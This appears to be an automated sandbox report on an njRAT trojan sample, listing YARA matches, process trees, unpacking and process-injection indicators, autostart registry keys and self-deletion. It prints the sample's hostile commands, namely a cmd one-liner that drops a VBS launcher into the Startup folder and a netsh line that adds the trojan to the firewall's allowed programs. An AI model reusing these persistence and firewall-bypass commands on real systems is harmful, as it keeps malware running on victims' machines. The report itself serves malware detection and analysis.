Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan

Source: nOZ2Oqnzbz.exe.0.dr, caspol.cs	Security API names: mutex.SetAccessControl
Source: nOZ2Oqnzbz.exe.0.dr, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: nOZ2Oqnzbz.exe.0.dr, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: nOZ2Oqnzbz.exe.0.dr, caspol.cs	Security API names: accessControl.AddAccessRule
Source: nOZ2Oqnzbz.exe.0.dr, caspol.cs	Security API names: mutex.GetAccessControl
Source: WindowsServices.exe.3.dr, caspol.cs	Security API names: mutex.SetAccessControl
Source: WindowsServices.exe.3.dr, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: WindowsServices.exe.3.dr, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: WindowsServices.exe.3.dr, caspol.cs	Security API names: accessControl.AddAccessRule
Source: WindowsServices.exe.3.dr, caspol.cs	Security API names: mutex.GetAccessControl

Source: classification engine

Classification label: mal100.phis.troj.adwa.spyw.expl.evad.winEXE@30/9@3/3

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 3_2_00AAA8CA AdjustTokenPrivileges,	3_2_00AAA8CA
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 3_2_00AAA893 AdjustTokenPrivileges,	3_2_00AAA893
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 12_2_00CBA8CA AdjustTokenPrivileges,	12_2_00CBA8CA
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 12_2_00CBA893 AdjustTokenPrivileges,	12_2_00CBA893
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 21_2_00C2A8CA AdjustTokenPrivileges,	21_2_00C2A8CA
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 21_2_00C2A893 AdjustTokenPrivileges,	21_2_00C2A893

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Code function: 0_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,

0_2_00405A10

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

File created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Mutant created: \Sessions\1\BaseNamedObjects\bf497657d005804b657fde8dd2d0cb46
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

File created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Jump to behavior

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"

Source: nOZ2Oqnzbz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nOZ2Oqnzbz.exe	ReversingLabs: Detection: 86%
Source: nOZ2Oqnzbz.exe	Virustotal: Detection: 86%

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

File read: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe C:\Users\user\Desktop\nOZ2Oqnzbz.exe
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe C:\Users\user\Desktop\nOZ2Oqnzbz.exe
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:	Binary string: caspol.pdbx source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000004.00000003.1705907869.0000000000781000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000009.00000002.1738164335.000000000073E000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1941548771.000000000073E000.00000004.00000020.00020000.00000000.sdmp, nOZ2Oqnzbz.exe.0.dr, WindowsServices.exe.3.dr
Source:	Binary string: caspol.pdb source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000004.00000003.1705907869.0000000000781000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000009.00000002.1738164335.000000000073E000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1941548771.000000000073E000.00000004.00000020.00020000.00000000.sdmp, nOZ2Oqnzbz.exe.0.dr, WindowsServices.exe.3.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Unpacked PE file: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Unpacked PE file: 12.2.WindowsServices.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Unpacked PE file: 21.2.WindowsServices.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Unpacked PE file: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Unpacked PE file: 12.2.WindowsServices.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Unpacked PE file: 21.2.WindowsServices.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

0_2_00405A10

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 0_2_0040B0E0 push eax; ret	0_2_0040B10E
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 21_2_00E90069 push ds; ret	21_2_00E9006A
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 21_2_00E90045 push ds; ret	21_2_00E90062

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs

Jump to behavior

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	File created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Jump to dropped file
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	File created: C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe	Jump to dropped file
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	File created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File created: C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)	Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46

Jump to behavior

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe

Jump to dropped file

Drops VBS files to the startup folder

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

File deleted: c:\users\user\desktop\noz2oqnzbz.exe

Jump to behavior

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Code function: 0_2_0040A440 IsIconic,6CF03130,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,6CF030D0,6CF016C0,6CF37140,73A24C40,6CEFE720,LPtoDP,73A24C00,6CF376C0,GetMapMode,6CF38460,DPtoLP,6CF387D0,GetWindowRect,6CEFE6C0,6CEFFEB0,73A24D40,6CF38160,6CF38160,6CF37850,6CF01660,6CF015D0,

0_2_0040A440

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
